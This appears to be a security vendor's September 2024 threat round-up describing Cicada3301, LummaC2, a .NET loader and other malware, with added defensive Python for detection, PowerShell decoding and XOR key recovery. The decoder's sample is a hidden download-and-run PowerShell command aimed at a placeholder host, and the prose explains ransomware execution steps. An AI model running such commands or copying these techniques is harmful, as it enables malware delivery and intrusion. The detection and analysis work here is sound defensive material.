Sep 27, 2024

Cicada3301 Ransomware, LummaC2 Infostealer, Obfuscated Net Loader, and More: Hacker’s Playbook Threat Coverage Round-up: September 2024

In this edition of the Hacker’s Playbook Threat Coverage round-up, we highlight attack coverage for several new threats. SafeBreach customers can select and run these attacks and more from the SafeBreach Hacker’s Playbook™ to validate their controls against these threats. Additional details about the threats and our coverage are below. 

Cicada3301 Ransomware – What you need to know

Threat researchers from the cybersecurity firm Truesec have identified a new ransomware group named Cicada3301. The group was first observed in June 2024, when it posted victim details on its blog. Based on the information available, Cicada3301 operates a ransomware-as-a-service (RaaS) model and practices double extortion: it steals victim data as well as encrypting the victim's systems.

The Cicada3301 ransomware is written in Rust and can target Windows and Linux/ESXi systems. It bears several similarities to the ALPHV/BlackCat ransomware:

  • Both are written in Rust
  • Both use ChaCha20 for encryption
  • Both use identical commands to shut down virtual machines
  • Both use a -ui option to display graphical output during encryption
  • Both use similar file-naming conventions
  • Both take a key parameter that is used to decrypt the ransom note

The threat group uses stolen credentials to gain initial access to victim networks and then uses a batch script to execute the ransomware payload against multiple hosts in the network. Rclone is used to exfiltrate stolen data out of the network. The ransom note is stored Base64-encoded and ChaCha20-encrypted; the encryptor decrypts it using the first 32 bytes of the key supplied at launch as the ChaCha20 secret key and the last 12 bytes of that key as the nonce. It then validates the decryption by checking whether the string "is_ok" appears in the decrypted data, a gate that also keeps the sample from detonating in a sandbox that is not given the correct key. 

If the validation succeeds, execution proceeds. The encryptor carries a legitimate copy of PsExec embedded within itself, which it extracts to C:\Users\Public\psexec0.exe. It then copies itself into C:\Users\Public\ and uses the extracted PsExec binary to execute that copy several more times with hard-coded credentials stolen from the victim network earlier in the intrusion, likely in an attempt to run the encryptor with higher privileges. The encryptor then runs a series of commands to terminate services and processes, delete shadow copies, and disable recovery features, among other tasks.
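The drop-PsExec-then-relaunch chain above is observable in endpoint telemetry. As an added detection example (not part of the SafeBreach playbook or Truesec's analysis), the following Python evaluates simple rules over constructed Sysmon-style events. The field names ("event", "image", "target", "cmdline"), the sample paths, the batch script name and the credentials are assumptions; the only facts taken from the write-up are the psexec0.exe drop location, the self-copy into C:\Users\Public\ and the credentialed PsExec relaunch. Because the write-up does not name the copied encryptor, that rule keys on any .exe written to C:\Users\Public\ by a process outside that folder.

```python
import ntpath
import re

PUBLIC_DIR = r"c:\users\public"
# PsExec takes explicit credentials as -u <user> -p <password>.
CRED_FLAGS = re.compile(r"(^|\s)-[up]\s", re.I)


def _in_public(path):
    return ntpath.normpath(path).lower().startswith(PUBLIC_DIR + "\\")


def _basename(path):
    return ntpath.basename(path).lower()


def rule_psexec_dropped(ev):
    # The embedded PsExec is extracted to C:\Users\Public\psexec0.exe.
    return (ev["event"] == "FileCreate"
            and _in_public(ev["target"])
            and _basename(ev["target"]) == "psexec0.exe")


def rule_exe_copied_to_public(ev):
    # The encryptor copies itself into C:\Users\Public\ (copy name not given, so any
    # .exe written there by a process that does not itself live in Public counts).
    return (ev["event"] == "FileCreate"
            and _in_public(ev["target"])
            and ev["target"].lower().endswith(".exe")
            and not _in_public(ev["image"]))


def rule_psexec_relaunch(ev):
    # The extracted PsExec launches a binary from Public with explicit credentials.
    return (ev["event"] == "ProcessCreate"
            and _basename(ev["image"]) == "psexec0.exe"
            and CRED_FLAGS.search(ev["cmdline"]) is not None
            and PUBLIC_DIR in ev["cmdline"].lower())


RULES = {
    "psexec_dropped_to_public": rule_psexec_dropped,
    "exe_copied_to_public": rule_exe_copied_to_public,
    "psexec_relaunch_with_creds": rule_psexec_relaunch,
}


def evaluate(events):
    """Return, per rule, the indices of the events that matched."""
    hits = {name: [] for name in RULES}
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(i)
    return hits


def cicada_like(events):
    # High-confidence verdict: PsExec dropped into Public and later used from there
    # with credentials. Either signal alone is noisy; the ordered pair is the chain.
    h = evaluate(events)
    return bool(h["psexec_dropped_to_public"] and h["psexec_relaunch_with_creds"]
                and h["psexec_dropped_to_public"][0] < h["psexec_relaunch_with_creds"][0])


# Constructed events (not real telemetry); the credential values are placeholders.
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c deploy.bat"},
    {"event": "FileCreate", "image": r"C:\Temp\enc.exe",
     "target": r"C:\Users\Public\psexec0.exe"},
    {"event": "FileCreate", "image": r"C:\Temp\enc.exe",
     "target": r"C:\Users\Public\enc.exe"},
    {"event": "ProcessCreate", "image": r"C:\Users\Public\psexec0.exe",
     "cmdline": r"psexec0.exe -accepteula -u CORP\svc_backup -p Hunter2 C:\Users\Public\enc.exe"},
]
BENIGN_EVENTS = [
    {"event": "FileCreate", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\Public\notes.txt"},
    {"event": "ProcessCreate", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\srv01 ipconfig"},
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS), cicada_like(SAMPLE_EVENTS))
    print(evaluate(BENIGN_EVENTS), cicada_like(BENIGN_EVENTS))
```

The same logic ports directly to a SIEM query: join file-creation events under C:\Users\Public\ with process-creation events whose image is in that folder and whose command line carries -u/-p, on the same host, in that order.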

SafeBreach Coverage of Cicada3301 Ransomware

The following individual attacks were added to the Hacker’s Playbook and can be individually run to validate organizational controls:

  • #10504 – Write Cicada3301 (553eab) ransomware to disk
  • #10505 – Pre-execution phase of Cicada3301 (553eab) ransomware (Windows)
  • #10506 – Transfer of Cicada3301 (553eab) ransomware over HTTP/S
  • #10507 – Transfer of Cicada3301 (553eab) ransomware over HTTP/S
  • #10508 – Email Cicada3301 (553eab) ransomware as a compressed attachment
  • #10509 – Email Cicada3301 (553eab) ransomware as a compressed attachment

LummaC2 Infostealer – What you need to know

Threat researchers from Ontinue have identified a new variant of the LummaC2 information stealer (infostealer) by analyzing an obfuscated PowerShell command. Lumma is an infostealer written in C that is used to steal sensitive data; it is advertised on Russian-speaking forums and sold as malware-as-a-service (MaaS). Once it infects a host, it collects information from the endpoint and exfiltrates it to its command-and-control (C2) server.

Based on the information available, the new sample was discovered when an encoded PowerShell command was observed contacting a malicious domain to download the LummaC2 payload. The command was Base64-encoded, and decoding it revealed the next stages of the intrusion. The malware uses a multi-stage infection process and abuses legitimate system tools along the way.
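Decoding such a command is the first triage step, and the usual mistake is to treat the Base64 payload as UTF-8: PowerShell's -EncodedCommand argument is UTF-16LE, so a UTF-8 decode shows a script interleaved with NUL bytes. The following Python is an added example (not Ontinue's tooling and not the command from their report): it pulls the Base64 argument out of a process command line, decodes it correctly, and lists the URLs and download-cradle keywords found. The sample command line, the script it carries and the domain (a reserved .invalid name) are constructed; the set of flag spellings and keywords is ours.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen in the wild (assumption: other prefixes are not matched).
ENC_FLAG = re.compile(r"^-e(c|nc|ncodedcommand)?$", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# Keywords typical of download cradles and staged loaders (our list, not exhaustive).
CRADLE_RE = re.compile(
    r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|net\.webclient|"
    r"invoke-expression|iex|start-bitstransfer|frombase64string)\b", re.I)


def extract_encoded_command(cmdline):
    """Return the Base64 argument that follows an -enc style flag, or None."""
    parts = cmdline.split()
    for i, tok in enumerate(parts[:-1]):
        if ENC_FLAG.match(tok):
            return parts[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64):
    # Tolerate stripped padding, then decode as UTF-16LE (not UTF-8).
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def triage(cmdline):
    """Decode an encoded PowerShell command line and summarise what it does."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return None
    script = decode_encoded_command(b64)
    indicators = []
    for hit in CRADLE_RE.findall(script):
        hit = hit.lower()
        if hit not in indicators:
            indicators.append(hit)
    return {"script": script, "urls": URL_RE.findall(script), "indicators": indicators}


# Constructed sample: a hidden-window download-and-run cradle, encoded the way
# powershell.exe -EncodedCommand expects it.
SAMPLE_SCRIPT = ("$u='http://example.invalid/update.bin';"
                 "(New-Object Net.WebClient).DownloadFile($u,\"$env:TEMP\\svc.exe\");"
                 "Start-Process \"$env:TEMP\\svc.exe\"")
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Run against real command lines from process-creation telemetry, the decoded script frequently contains a second encoded or compressed layer; feed the output back through the same function (or a decompressor) until plain PowerShell emerges.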

SafeBreach Coverage of LummaC2 Infostealer

The following individual attacks were added to the Hacker’s Playbook and can be individually run to validate organizational controls:

  • #10498 – Write LummaC2 (709a8a) infostealer to disk
  • #10499 – Pre-execution phase of LummaC2 (709a8a) infostealer (Windows)
  • #10500 – Transfer of LummaC2 (709a8a) infostealer over HTTP/S
  • #10501 – Transfer of LummaC2 (709a8a) infostealer over HTTP/S
  • #10502 – Email LummaC2 (709a8a) infostealer as a compressed attachment
  • #10503 – Email LummaC2 (709a8a) infostealer as a compressed attachment

Obfuscated NET Loader – What you need to know

Threat researchers from Cyble have identified a campaign targeting individuals associated with the upcoming US-Taiwan Defense Industry Conference. The threat actors deliver a ZIP archive containing an LNK file that masquerades as a PDF form to avoid raising suspicion. When the LNK file is opened, it runs commands that drop an executable into the Startup folder, so the executable is launched again after every reboot and persistence is maintained. The executable is protected with Confuser, a .NET obfuscator, to hinder analysis and detection. When it runs, it retrieves additional malicious content from a remote server, specifically a DLL that is XOR-encrypted to obscure its purpose, and loads it directly in memory, which helps the final payload evade detection by file-based security controls. The deployed payload is used to exfiltrate sensitive data from the victim's machine and to support further malicious activity.
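The XOR-encrypted DLL above is the kind of artifact an analyst recovers from a network capture or memory dump without knowing the key. The following Python is an added example (not code from Cyble's report) showing the standard known-plaintext approach: the default DOS stub in a PE file places the text "This program cannot be run in DOS mode." at offset 0x4E, which is enough to derive a repeating XOR key of up to 39 bytes, and the candidate is confirmed by checking the MZ/PE structure rather than trusting the stub alone. The sample "PE" is a constructed skeleton and the key "k3y!" is constructed; the scheme (a repeating key applied to every byte, no longer than the stub text, on a module that keeps the default stub) is an assumption, because the page says only that XOR was used.

```python
import struct

DOS_STUB_TEXT = b"This program cannot be run in DOS mode."
DOS_STUB_OFFSET = 0x4E  # where the default MS linker DOS stub places that text


def xor_repeating(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data):
    # Structural check: 'MZ' magic, e_lfanew at 0x3C, 'PE\0\0' at e_lfanew.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_xor_key(blob, max_key_len=len(DOS_STUB_TEXT)):
    """Try key lengths 1..max_key_len; derive each key byte from the known stub text,
    reject inconsistent candidates, and confirm by PE structure.
    Returns (key, plaintext) or None."""
    if len(blob) < DOS_STUB_OFFSET + len(DOS_STUB_TEXT):
        return None
    for length in range(1, max_key_len + 1):
        key = [None] * length
        consistent = True
        for i, p in enumerate(DOS_STUB_TEXT):
            pos = DOS_STUB_OFFSET + i
            k = blob[pos] ^ p
            idx = pos % length  # key is applied from offset 0, so index by absolute position
            if key[idx] is None:
                key[idx] = k
            elif key[idx] != k:
                consistent = False
                break
        if not consistent or None in key:
            continue
        key_bytes = bytes(key)
        plain = xor_repeating(blob, key_bytes)
        if looks_like_pe(plain):
            return key_bytes, plain
    return None


def build_fake_pe():
    # Constructed PE-shaped buffer (not a real module): DOS header with e_lfanew = 0x80,
    # the default DOS stub code and text, then the PE signature.
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x40:0x4E] = bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")
    buf[DOS_STUB_OFFSET:DOS_STUB_OFFSET + len(DOS_STUB_TEXT)] = DOS_STUB_TEXT
    buf[0x80:0x84] = b"PE\0\0"
    return bytes(buf)


SAMPLE_PLAIN = build_fake_pe()
SAMPLE_KEY = b"k3y!"  # constructed key
SAMPLE_ENCRYPTED = xor_repeating(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    result = recover_xor_key(SAMPLE_ENCRYPTED)
    print(result[0] if result else None)  # b'k3y!'
```

The structural confirmation matters: a short key can look consistent over the stub text yet be wrong elsewhere, and some loaders skip NUL bytes or rotate the key per block, in which case this recovery fails cleanly (returns None) rather than producing a plausible-looking but corrupt module.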

SafeBreach Coverage of Obfuscated NET Loader

  • #10492 – Write Obfuscated NET (9591d7) loader to disk
  • #10493 – Pre-execution phase of Obfuscated NET (9591d7) loader (Windows)
  • #10494 – Transfer of Obfuscated NET (9591d7) loader over HTTP/S
  • #10495 – Transfer of Obfuscated NET (9591d7) loader over HTTP/S
  • #10496 – Email Obfuscated NET (9591d7) loader as a compressed attachment
  • #10497 – Email Obfuscated NET (9591d7) loader as a compressed attachment

Other Threats We Added Coverage for in September 2024

We also added coverage for the following threats to give our customers an additional, comprehensive level of protection.

ShellClient Backdoor – This malware is a custom remote access trojan (RAT) also known as GhostShell. It masquerades as a legitimate Windows program such as “RuntimeBroker.exe” or “svchost.exe” to evade detection, and it steals and exfiltrates data using Dropbox as its command-and-control (C2) channel. This RAT can:

  • Collect system information such as hostname, IP address, antivirus products
  • Connect to https://ipinfo.io for additional IP information
  • Install as service
  • Start CMD or PowerShell
  • Start a TCP / FTP / Telnet client
  • Upload, download, and launch PowerShell commands
  • Replicate the client on the target to establish additional connections

The playbook includes the following coverage for this malware:

  • #10451 – Write ShellClient (eb03b7) backdoor to disk (HOST_LEVEL)
  • #10452 – Pre-execution phase of ShellClient (eb03b7) backdoor (Windows) (HOST_LEVEL)
  • #10453 – Transfer of ShellClient (eb03b7) backdoor over HTTP/S (LATERAL_MOVEMENT) 
  • #10454 – Transfer of ShellClient (eb03b7) backdoor over HTTP/S (INFILTRATION) 
  • #10455 – Email ShellClient (eb03b7) backdoor as a compressed attachment (LATERAL_MOVEMENT) 
  • #10456 – Email ShellClient (eb03b7) backdoor as a compressed attachment (INFILTRATION) 

LONEJOGGER Downloader – LONEJOGGER is a downloader/dropper that has been observed targeting cryptocurrency services (including exchanges and investment companies). It uses a .lnk shortcut to download guard-railed HTML Application (HTA) payloads. North Korean threat actors, including APT43, have used it to pursue their objectives, including targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea.

The playbook includes the following coverage for this malware:

  • #10457 – Write LONEJOGGER (c87520) downloader to disk (HOST_LEVEL)
  • #10458 – Transfer of LONEJOGGER (c87520) downloader over HTTP/S (LATERAL_MOVEMENT)
  • #10459 – Transfer of LONEJOGGER (c87520) downloader over HTTP/S (INFILTRATION)
  • #10460 – Email LONEJOGGER (c87520) downloader as a compressed attachment (LATERAL_MOVEMENT)
  • #10461 – Email LONEJOGGER (c87520) downloader as a compressed attachment (INFILTRATION)

Interested in Protecting Against Advanced Ransomware?

SafeBreach now offers a complimentary and customized real-world ransomware assessment, RansomwareRx, that allows you to gain unparalleled visibility into how your security ecosystem responds at each stage of the defense process. This ransomware assessment includes:

  • Training: Understand the methodology around ransomware attacks, persistent threats, and malware attacks.
  • Assessment: Review goals and ensure simulation connections to our management console and all configurations are complete.
  • Attack Scenario: Run safe-by-design, real-world ransomware attacks across the cyber kill chain on a single device of your choice.
  • Report: Receive a custom-built report with simulation results and actionable remediation insights.

Empower your team to understand more about ransomware attacks, methodologies, and behaviors—all through the lens of the attacker. Request your complimentary RansomwareRx assessment today.
